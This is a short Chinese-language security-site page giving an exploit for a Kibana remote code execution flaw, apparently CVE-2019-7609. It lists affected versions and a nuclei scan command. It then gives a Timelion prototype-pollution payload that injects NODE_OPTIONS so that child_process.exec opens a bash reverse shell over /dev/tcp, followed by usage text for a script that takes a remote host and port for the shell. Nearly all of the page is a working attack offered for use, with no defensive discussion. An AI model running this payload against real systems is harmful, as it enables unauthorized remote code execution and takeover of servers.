湛蓝安全空间 |狂野湛蓝，暴躁每天

影响范围

kibana = 5.6.15
kibana <= 6.6.0

POC

nuceli -tags kibana -t cves/ -l urls.txt

EXP

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

脚本

 python CVE-2019-7609.py -u http://xxx.com -host vps-ip -port vps-port --shell

optional arguments:
  -h, --help         show this help message and exit
  -u URL             such as: http://127.0.0.1:5601
  -host REMOTE_HOST  reverse shell remote host: such as: 1.1.1.1
  -port REMOTE_PORT  reverse shell remote port: such as: 8888
  --shell            reverse shell after verify